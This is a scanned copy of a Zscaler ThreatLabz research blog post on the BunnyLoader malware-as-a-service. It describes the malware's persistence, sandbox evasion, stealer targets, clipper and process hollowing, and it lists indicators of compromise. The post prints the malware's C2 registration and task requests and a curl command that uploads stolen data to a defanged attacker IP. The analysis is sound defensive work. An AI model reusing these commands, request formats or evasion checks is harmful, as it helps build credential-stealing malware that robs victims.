www.zscaler.com
Open in
urlscan Pro
2606:4700::6812:1c4a
Public Scan
Submitted URL: http://www.zscaler.com/blogs/security-research/bunnyloader-newest-malware-service
Effective URL: https://www.zscaler.com/blogs/security-research/bunnyloader-newest-malware-service
Submission: On October 05 via api from DE — Scanned from DE
Effective URL: https://www.zscaler.com/blogs/security-research/bunnyloader-newest-malware-service
Submission: On October 05 via api from DE — Scanned from DE
Form analysis
3 forms found in the DOM<form class="topSearch_searchInputWrapper__n8dSG" __bizdiag="107944136" __biza="W___"><input type="text" name="query" class="topSearch_searchInput__E0Bk3" placeholder="What are you looking for?" aria-label="What are you looking for?"
aria-hidden="true" tabindex="-1" value=""></form>
<form class="marketoForm_root__Wkgni marketoForm_variant_cta_module__IwKzs" id="mktoForm_7971" style="opacity:0" __bizdiag="196539198" __biza="W___"></form>
<form class="marketoForm_root__Wkgni marketoForm_variant_footer__jwLCq footer-subscription" id="mktoForm_1944" style="opacity:0" __bizdiag="196360362" __biza="W___"></form>
Text Content
Press Alt+1 for screen-reader mode, Alt+0 to cancelAccessibility Screen-Reader Guide, Feedback, and Issue Reporting This site uses JavaScript to provide a number of functions, to use this site please enable JavaScript in your browser. OpenSearch CXO REvolutionariesCareersPartnersSupport ShowContact UsOptions Get in touch1-408-533-0288Chat with us ShowSign InOptions admin.zscaler.netadmin.zscalerone.netadmin.zscalertwo.netadmin.zscalerthree.netadmin.zscalerbeta.netadmin.zscloud.netZscaler Private Access Home The Zscaler ExperienceProducts & SolutionsPlatformResourcesCompany Request a demoopen search open navigation The Zscaler Experience Zscaler: A Leader in the 2023 Gartner® Magic Quadrant™ for Security Service Edge (SSE) Get the full report Your world, secured Experience the transformative power of zero trust. The Zscaler Difference The Zscaler Difference Experience the World’s Largest Security Cloud Customer Success Stories Analyst Recognition Machine Learning and AI at Zscaler Reduce Your Carbon Footprint Zero Trust Fundamentals Zero Trust Fundamentals What is Zero Trust? What Is Security Service Edge (SSE)? What Is Secure Access Service Edge (SASE)? What Is Zero Trust Network Access (ZTNA)? What Is Secure Web Gateway (SWG)? What Is Cloud Access Security Broker (CASB)? What Is Cloud Native Application Protection Platform (CNAPP)? Zero Trust Resources Products & Solutions Secure Your Users Provide users with seamless, secure, reliable access to applications and data. Secure Your Workloads Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud. Secure Your IoT and OT Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems. Products Products Transform your organization with 100% cloud native services Secure Internet Access (ZIA) Secure Private Access (ZPA) Data Protection (CASB/DLP) Digital Experience (ZDX) Posture Control Partner IntegrationsIndustry and Market Solutions Solution Areas Solution Areas Propel your business with zero trust solutions that secure and connect your resources Stop Cyberattacks Protect Data Zero Trust App Access VPN Alternative Accelerate M&A Integration Optimize Digital Experiences Zero Trust Branch Connectivity Build and Run Secure Cloud Apps Zero Trust Cloud Connectivity Zero Trust for IoT/OT Zero Trust for Private 5G Find a product or solution Platform Zero Trust Exchange Platform Learn how Zscaler delivers zero trust with a cloud native platform that is the world’s largest security cloud Zero Trust Exchange PlatformTitle Link Transform with Zero Trust Architecture Transform with Zero Trust Architecture Propel your transformation journey Secure Digital Transformation Network Transformation Application Transformation Security Transformation Secure Your Business Goals Secure Your Business Goals Achieve your business and IT initiatives Accelerate M&A and Divestitures Recession-Proof Your Enterprise Secure Your Hybrid Workforce Download Zscaler Client Connectors Resources Learn, connect, and get support. Explore tools and resources to accelerate your transformation and secure your world Learn, connect, and get support.Title Link Amplifying the voices of real-world digital and zero trust pioneers Visit now Resource Center Resource Center Stay up to date on best practices Resource Library Blog Customer Success Stories Webinars & Demos Zpedia Events & Trainings Events & Trainings Find programs, certifications, and events Upcoming Events Zenith Live Zscaler Academy Interactive Zscaler Whiteboard Workshop Security Research & Services Security Research & Services Get research and insights at your fingertips ThreatLabz Analytics Tools Tools Tools designed for you Security Preview Security and Risk Assessment Security Advisory Updates Disclose a Vulnerability Executive Insights App Ransomware Protection ROI Calculator Community & Support Community & Support Connect and find support Customer Success Center Zenith Community CXO REvolutionaries Zscaler Help Portal Download Zscaler Client Connector Industry & Market Solutions Industry & Market Solutions See solutions for your industry and country Public Sector Healthcare See all Resource Center Resource Center Stay up to date on best practices Resource Library Blog Customer Success Stories Webinars & Demos Zpedia Events & Trainings Events & Trainings Find programs, certifications, and events Upcoming Events Zenith Live Zscaler Academy Interactive Zscaler Whiteboard Workshop Security Research & Services Security Research & Services Get research and insights at your fingertips ThreatLabz Analytics Tools Tools Tools designed for you Security Preview Security and Risk Assessment Security Advisory Updates Disclose a Vulnerability Executive Insights App Ransomware Protection ROI Calculator Community & Support Community & Support Connect and find support Customer Success Center Zenith Community CXO REvolutionaries Zscaler Help Portal Download Zscaler Client Connector Industry & Market Solutions Industry & Market Solutions See solutions for your industry and country Public Sector Healthcare See all Company About Zscaler Discover how it began and where it’s going Partners Meet our partners and explore system integrators and technology alliances News & Announcements Stay up to date with the latest news Leadership Team Meet our management team Partner Integrations Explore best-in-class partner integrations to help you accelerate digital transformation Investor Relations See news, stock information, and quarterly reports Environmental, Social & Governance Learn about our ESG approach Careers Join our mission Press Center Find everything you need to cover Zscaler Compliance Understand our adherence to rigorous standards Zenith Ventures Understand our adherence to rigorous standards ZSCALER BLOG Get the latest Zscaler blog updates in your inbox Subscribe Security Research BUNNYLOADER, THE NEWEST MALWARE-AS-A-SERVICE NIRAJ SHIVTARKAR, SATYAM SINGH September 29, 2023 - 11 min read Threatlabz Research Contents 1. Introduction 2. Key Takeaways 3. Basics 4. C2 Panel 5. Technical Analysis 6. Conclusion 7. Zscaler Sandbox Coverage 8. Indicators of Compromise (IOCs) 9. More blogs Copy URL Copy URL INTRODUCTION In early September, Zscaler ThreatLabz discovered a new Malware-as-a-Service (MaaS) threat called “BunnyLoader” being sold on various forums. BunnyLoader provides various functionalities such as downloading and executing a second-stage payload, stealing browser credentials and system information, and much more. BunnyLoader employs a keylogger to log keystrokes as and a clipper to monitor the victim’s clipboard and replace cryptocurrency wallet addresses with actor-controlled cryptocurrency wallet addresses. Once the information is obtained, BunnyLoader encapsulates the data into a ZIP archive and proceeds to transmit the pilfered data to a command-and-control (C2) server. In this blog, we’ll describe how BunnyLoader works and its technical components. KEY TAKEAWAYS * ThreatLabz identified a new malware loader written in C/C++ named “BunnyLoader” sold on various forums for $250. * BunnyLoader is under rapid development with multiple feature updates and bug fixes. * BunnyLoader employs various anti-sandbox techniques during its attack sequence. * BunnyLoader downloads and executes a second-stage payload, logs keys, steals sensitive information and cryptocurrency, and executes remote commands. BASICS In early September, ThreatLabz came across a new malware loader named BunnyLoader. The malware was being sold on various forums by a user named “PLAYER_BUNNY”/”PLAYER_BL”, who seems to be one of the developers of the loader as shown in the figure below. Figure 1: BunnyLoader advertisement from criminal forums. Based on the advertisement, BunnyLoader has the following features: * Written in C/C++ * Fileless loader - download & execute further malware stages in memory * Consists of stealer and clipper capabilities * Remote command execution * Incorporates anti-analysis techniques * Provides a web panel showcasing stealer logs, total clients, active tasks and much more * Price - $250 (Lifetime) Since BunnyLoader’s v1.0 initial release on September 4, 2023, the malware has been under rapid development, with many feature updates and bug fixes being released between the 4th of September and the time this blog was written (September 29 2023). In the table below, you can see that BunnyLoader’s updates address bug issues, changes to the C2 panel, and even new pricing tiers. BunnyLoader release historyVersionDate of ReleaseUpdatesBunnyLoader v1.0Sept 4, 2023N/ABunnyLoader v1.1Sept 5, 2023 * Client bug * Compress stealer logs before uploading * Command added for reverse shell: pwd BunnyLoader v1.2Sept 6, 2023 * Added browser history recovery to stealer * Added NGRok auth-token recovery to stealer * Added Chromium browser paths (Chromium, Google Chrome x86, MapleStudio, Iridium, Maxthon3) BunnyLoader v1.3Sept 9, 2023 * Added credit card recovery to stealer function * Added support for 16 different credit card types * Fix C2 bugs BunnyLoader v1.4Sept 10, 2023Implemented AV evasionBunnyLoader v1.5Sept 11, 2023 * Added VPN recovery to stealer (ProtonVPN & OpenVPN) * Fix fileless loader bugs * Optimization in loading logs BunnyLoader v1.6Sept 12, 2023 * Added downloads history viewer to stealer * Added anti-sandbox techniques BunnyLoader v1.7Sept 15, 2023Implemented additional AV evasionBunnyLoader v1.8Sept 15, 2023 * Implemented keylogger functionality * Bug fixes in execution of tasks * Fix C2 bugs BunnyLoader v1.9Sept 17, 2023 * Added game recovery to stealer (Uplay & Minecraft) * Added 5 Chromium browser paths * Added 1 desktop wallet recovery to stealer BunnyLoader v2.0Sept 27, 2023 * C2 GUI Changes * Fix critical vulnerabilities - SQL injection in the C2 Panel which would give access to the database and XSS vulnerabilities fixed * Major bugs fixed * C2 will detect and block exploit attempts * Optimization in stealer * Optimization in fileless loader Selling private stub: * Advanced and proactive anti-analysis * Inject payload into memory (support x86/x64) * AV evasion * Persistence New prices: * Payload - $250 * Payload + Stub - $350 C2 PANEL The BunnyLoader C2 panel showcases a list of various tasks including: * downloading and executing additional malware * keylogging * stealing credentials * manipulating a victim’s clipboard to steal cryptocurrency * running remote commands on the infected machine The parameters consisting of the download URL and the cryptocurrency wallet addresses are added in the panel as shown below. Figure 2: A screenshot of the BunnyLoader C2 panel configuration. The BunnyLoader panel also provides: * statistics for infections * the total connected/disconnected clients * active tasks * stealer logs and also The information can be cleared from the panel. Figure 3: A screenshot of the statistics and options to clear data in the BunnyLoader C2 panel. In addition, the infected machines can be controlled remotely through the C2 panel, as shown in the screenshot below. Figure 4: A screenshot of the BunnyLoader C2 panel showing infected systems. TECHNICAL ANALYSIS In the following section, we will analyze a malware sample of BunnyLoader. Upon execution of BunnyLoader, the loader performs the following actions: 1. Creates a new registry value named “Spyware_Blocker” in the Run registry key (HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run) where the value is the path to the BunnyLoader binary. This registry value allows BunnyLoader to maintain persistence on the machine. 2. Hides the window using ShowWindow() with nCmdShow as SW_HIDE 3. Creates a mutex name “BunnyLoader_MUTEXCONTROL” via CreateMutexW() 4. Performs the following anti-VM techniques: * Checks for the following modules: * SxIn.dll - 360 Total Security * cmdvrt32.dll / cmdvrt64.dll - Comodo Antivirus * wine_get_unix_file_name - Detects Wine * SbieDll.dll - Sandboxie * Checks for a VM using “ROOT\CIMV2” queries: * SELECT * FROM Win32_VideoController * Win32_Processor * Win32_NetworkAdapter * Win32_BIOS * SELECT * FROM Win32_ComputerSystem * Checks for a Docker container via “/proc/1/cgroup” - if the container exists, BunnyLoader does not perform further malicious actions. * Checks for the following blacklisted sandbox usernames: * ANYRUN * Sandbox * Test * John Doe * Abby * Timmy * Maltest * malware * Emily * Timmy * Paul Jones * CurrentUser * IT-ADMIN * Walker * Lisa * WDAGUtilityAccount * Virus * fred If a sandbox is identified, BunnyLoader throws the following error message: “The version of this file is not compatible with the current version of Windows you are running. Check your computer's system information to see whether you need an x86 (32-bit) or x64 (64-bit) version of the program, and then contact the software publisher.” Otherwise, BunnyLoader performs an HTTP registration request to a C2 server as shown below: -------------------------------------------------------------------------------- GET /Bunny/Add.php?country=<country>&ip=<ip>&host=<host>&ver=2.0&system=Microsoft+Windows+10+Pro%0A&privs=Admin&av=Windows+Defender HTTP/1.1 User-Agent: BunnyLoader Host: 37[.]139[.]129[.]145 Cache-Control: no-cache HTTP/1.1 200 OK Date: Mon, 25 Sep 2023 21:11:41 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4 X-Powered-By: PHP/8.2.4 Content-Length: 11 Content-Type: text/html; charset=UTF-8 Connected -------------------------------------------------------------------------------- The registration request sent to the C2 server (shown above) contains the following information: Information in C2 server requestValueDescriptioncountryGathers the country where the infected system is connecting from via “http[:]//ip-api.com/csv” where the user agent is “BunnyRequester”ipGathers the victim IP from “http[:]//api.ipify.org” where the user agent is “BunnyRequester”hostGathers the hostname via GetComputerNameAverThe version of BunnyLoader (e.g., 2.0)system Fetches the operating system via “systeminfo | findstr /B /C:"OS Name” privsFetches the privileges of the current user via OpenProcessToken. Sends “Admin” if the user is an administrator or sends the string “user”.avGathers the anti-virus on the infected machine via wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName /value The user agent for the request is set to “BunnyLoader”. If the response from the C2 is “Connected”, BunnyLoader performs the core malicious actions. Task Execution After registration, BunnyLoader sends a task request to the C2 server “http[:]//37[.]139[.]129[.]145/Bunny/TaskHandler.php?BotID=<bot_id>” with the user agent as “BunnyTasks”. As shown below, the response to the task request consists of the “ID”, “Name” and “Params”. -------------------------------------------------------------------------------- GET /Bunny/TaskHandler.php?BotID=<Bot_ID> HTTP/1.1 User-Agent: BunnyTasks Host: 37[.]139[.]129[.]145 Cache-Control: no-cache HTTP/1.1 200 OK Date: Mon, 25 Sep 2023 21:11:41 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4 X-Powered-By: PHP/8.2.4 Content-Length: 102 Content-Type: text/html; charset=UTF-8 ID: 5 Name: Run Stealer Params: ID: 3 Name: Bitcoin Params: bc1<bitcoin_address>5k -------------------------------------------------------------------------------- Here the "Name" is the module (functionality) to be executed and the “params” are the parameters passed to the module. Based on the module name received in the task response, BunnyLoader further performs its actions. BunnyLoader consists of the following tasks: * Trojan Downloader * Download and Execute (Fileless Execution) * Download and Execute (Disk Execution) * Intruder * Run Keylogger * Run Stealer * Clipper * Bitcoin * Monero * Ethereum * Litecoin * Dogecoin * ZCash * Tether * Remote Command Execution Run Keylogger Task BunnyLoader implements a basic keylogger using GetAsyncKeyState() for logging key strokes. The output of the keylogger is stored in the file “C:\Users\<username>\AppData\Local\Keystrokes.txt”. Run Stealer Task BunnyStealer is designed to steal information related to web browsers, cryptocurrency wallets, VPNs and much more. Eventually the stolen information is stored in a folder named “BunnyLogs” in the Appdata\Local Directory, which is compressed as a ZIP archive, and exfiltrated to the C2 server. The following are the web browsers targeted by BunnyLoader: * 7Star\7Star\User Data * Yandex\YandexBrowser\User Data * CentBrowser\User Data * Comodo\User Data * Chedot\User Data * 360Browser\Browser\User Data * Vivaldi\User Data * Maxthon3\User Data * Kometa\User Data * K-Melon\User Data * Elements Browser\User Data * Google\Chrome\User Data\\Sputnik\Sputnik\User Data * Epic Privacy Browser\User Data * Nichrome\User Data * uCozMedia\Uran\User Data * CocCoc\Browser\User Data * Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer * Uran\User Data * CatalinaGroup\Citrio\User Data * Chromodo\User Data * Coowon\Coowon\User Data * Mail.Ru\Atom\User Data * liebao\User Data * Microsoft\Edge\User Data * QIP Surf\User Data * BraveSoftware\Brave-Browser\User Data * Orbitum\User Data * Chromium\User Data * Comodo\Dragon\User Data * Google(x86)\Chrome\User Data * Amigo\User\User Data * MapleStudio\ChromePlus\User Data * Torch\User Data * Iridium\User Data BunnyLoader steals following information from these web browsers: * AutoFill data * Credit cards * Downloads * History * Passwords The malware targets the following cryptocurrency wallets: * Armory * Exodus * AutomaticWallet * Bytecoin * Ethereum * Coinomi * Jaxx * Electrum * Guarda BunnyLoader steals credentials from the following VPN clients: * ProtonVPN * OpenVPN Credentials are also stolen from following messaging applications: * Skype * Tox * Signal * Element * ICQ Examples of the stolen information are shown in the figure below. The logs consist of an information.txt file which contains system information along with the information related to the location of the infected machine. Each folder contains the corresponding data stolen from the system. For example, the Browser folder contains the web browser history and downloaded file information. Figure 5: A screenshot of the information exfiltrated by BunnyLoader. The stolen data is archived using the Powershell cmdlet: System.IO.Compression.ZipFile with the filename “BunnyLogs_<hostname>.zip”. The ZIP archive is exfiltrated to the C2 server via the following CURL command: -------------------------------------------------------------------------------- cmd.exe /c curl -F "file=@C:\Users\user\AppData\Local\BunnyLogs_468325.zip" http[:]//37[.]139[.]129[.]145/Bunny/Uploader.php -------------------------------------------------------------------------------- BunnyLoader also performs a stealer registration request containing statistics related to the stolen information and the link to the exfiltrated logs with the user agent: “BunnyStealer”, as shown below: -------------------------------------------------------------------------------- GET /Bunny/StealerRegistration.php?country=<country>&ip=<ip>&system=Micro soft+Windows+10+Pro%0A&chromium=18&crypto=1&messages=0&vpn=0&keys=0&lin k=http%3A%2F%2F37[.]139[.]129[.]145%2FBunny%2FStealerLogs%2FBunnyLogs_ 468325.zip&date=Mon+Sep+25+21%3A47%3A41+2023%0A&games=0 HTTP/1.1 User-Agent: BunnyStealer Host: 37[.]139[.]129[.]145 Cache-Control: no-cache -------------------------------------------------------------------------------- Clipper Task The BunnyLoader clipper module checks a victim's clipboard for content matching cryptocurrency addresses and replaces them with a wallet address controlled by the threat actor. In this case, the targeted cryptocurrencies are: * Bitcoin * Monero * Ethereum * Litecoin * Dogecoin * ZCash * Tether The clipper receives the cryptocurrency wallet addresses to replace from the C2 server. Download and Execute Task BunnyLoader performs two types of download and execute functions. * The first type is downloading a file from a URL provided by the C2, which is written to disk in the AppData\Local directory and further executed. * The second type uses fileless execution, where BunnyLoader creates a “notepad.exe” process in a suspended state and then downloads the payload from the received URL with the user agent “BunnyLoader_Dropper”. The downloaded binary is stored in a memory buffer and BunnyLoader performs Process Hollowing to inject the downloaded payload into the “notepad.exe” process as shown in the figure below. Figure 6: A screenshot of BunnyLoader fileless download and executing code. After the tasks are completed, BunnyLoader sends the following task completion request with the user agent as “TaskCompleted” and the CommandID as the Task ID. An example task completion request is shown below: -------------------------------------------------------------------------------- http://37[.]139[.]129[.]145/Bunny/TaskHandler.php?CommandID=5&BotID=272148461 -------------------------------------------------------------------------------- Remote Command Execution Task BunnyLoader performs remote command execution from the C2 panel. BunnyLoader receives the commands to be executed on the infected machine via an “echoer” request to C2 server (e.g., http[:]//37[.]139[.]129[.]145/Bunny/Echoer.php) with the user agent set to “BunnyTasks” as shown in the figure below. BunnyLoader parses the response and checks for the following commands: “help”, “cd”, “pwd” and then executes the command using _popen and the command output is been sent across to the C2 server as the “&value=” parameter in a result command request: (e.g., http[:]//37[.]139[.]129[.]145/Bunny/ResultCMD.php) with the user agent: “BunnyShell”. Figure 7: A screenshot of BunnyLoader remote command execution. BunnyLoader also performs a heartbeat request in order to inform the C2 that the infected system is online as shown below. The user agent for the heartbeat is “HeartBeat_Sender”. -------------------------------------------------------------------------------- GET /Bunny/Heartbeat.php?country=<country>&ip=<ip>&host=<hostname>&ver=2.0&system=Microsoft+Windows+10+Pro%0A&privs=Admin&av=Windows+Defender HTTP/1.1 User-Agent: HeartBeat_Sender Host: 37[.]139[.]129[.]145 Cache-Control: no-cache HTTP/1.1 200 OK Date: Mon, 25 Sep 2023 21:11:41 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4 X-Powered-By: PHP/8.2.4 Content-Length: 13 Content-Type: text/html; charset=UTF-8 Client online -------------------------------------------------------------------------------- CONCLUSION BunnyLoader is a new MaaS threat that is continuously evolving their tactics and adding new features to carry out successful campaigns against their targets. The Zscaler ThreatLabz team will continue to monitor these attacks to help keep our customers safe. Figure 10: Zscaler Sandbox detecting BunnyLoader. Win32.Downloader.BunnyLoader INDICATORS OF COMPROMISE (IOCS) C2 Server - 37[.]139[.]129[.]145/Bunny/ BunnyLoader samples: * dbf727e1effc3631ae634d95a0d88bf3 * bbf53c2f20ac95a3bc18ea7575f2344b * 59ac3eacd67228850d5478fd3f18df78 EXPLORE MORE ZSCALER BLOGS Agniane Stealer: Dark Web’s Crypto Threat Read Post Mystic Stealer Read Post Technical Analysis of Xloader’s Code Obfuscation in Version 4.3 Read Post GET THE LATEST ZSCALER BLOG UPDATES IN YOUR INBOX By submitting the form, you are agreeing to our privacy policy. THE ZSCALER EXPERIENCE Learn about: Your world, secured.Zero TrustSecurity Service Edge (SSE)Secure Access Service Edge (SASE)Zero Trust Network Access (ZTNA)Secure Web Gateway (SWG)Cloud Access Security Broker (CASB)Cloud Native Application Protection Platform (CNAPP) PRODUCTS & SOLUTIONS Secure Your Users Secure Your Workloads Secure Your IoT and OT Secure Internet Access (ZIA) Secure Private Access (ZPA) Digital Experience (ZDX) Posture Control Industry & Market Solutions Partner Integrations Zscaler Client Connector PLATFORM Zero Trust Exchange Platform Secure Digital Transformation Application Transformation Network Transformation Security Transformation RESOURCES Resource Library Security Preview Security & Risk Assessment Internet Threat Exposure Analysis ThreatLabz Analytics & Insights Upcoming Events Blog Zscaler Academy CXO Revolutionaries Zpedia Ransomware Protection ROI Calculator POPULAR LINKS Pricing & Plans About Zscaler Leadership Team Career Opportunities Find or Become a Partner Customer Success Center Investor Relations Press Center News & Announcements ESG Compliance Contact Zscaler Home English EnglishFrançaisDeutschItaliano日本Castellano - MexicoCastellano - España Zscaler is universally recognized as the leader in zero trust. Leveraging the largest security cloud on the planet, Zscaler anticipates, secures, and simplifies the experience of doing business for the world's most established companies. English EnglishFrançaisDeutschItaliano日本Castellano - MexicoCastellano - España Visit us on FacebookLinkedinFollow us on TwitterSubscribe our Youtube Channel SitemapPrivacyLegalSecurity © 2023 Zscaler, Inc. All rights reserved. Zscaler™ and other trademarks listed at zscaler.com/legal/trademarks are either (i) registered trademarks or service marks or (ii) trademarks or service marks of Zscaler, Inc. in the United States and/or other countries. Any other trademarks are the properties of their respective owners. Zscaler uses cookies to personalize content and ads, to provide social media features and to analyze our traffic. We also share information about your use of our site with our social media, advertising and analytics partners.Please review our Cookies Policy for more information. Cookies Settings Accept Cookies